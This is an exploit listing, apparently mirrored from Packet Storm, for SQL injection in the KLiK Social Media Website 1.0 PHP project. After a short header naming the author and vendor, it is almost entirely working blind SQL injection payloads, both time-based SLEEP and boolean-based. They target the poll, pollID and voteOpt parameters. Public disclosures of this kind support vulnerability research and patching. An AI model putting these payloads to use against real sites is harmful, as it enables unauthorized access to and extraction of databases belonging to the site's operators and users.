Exploit for KLiK Social Media Website 1.0 SQL Injection

Name: Exploit for KLiK Social Media Website 1.0 SQL Injection
Rating: 5 (181 reviews)

2022-04-07 | CVSS 0.1

## https://sploitus.com/exploit?id=PACKETSTORM:166634
# Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi  
# Date: April 1st, 2022  
# Exploit Author: corpse  
# Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite  
# Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite  
# Version: 1.0  
# Tested on: Debian 11  
  
Parameter: poll (GET)  
Type: time-based blind  
Title: MySQL time-based blind - Parameter replace (ELT)  
Payload: poll=ELT(1079=1079,SLEEP(5))  
  
Parameter: pollID (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS)  
  
Parameter: voteOpt (POST)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15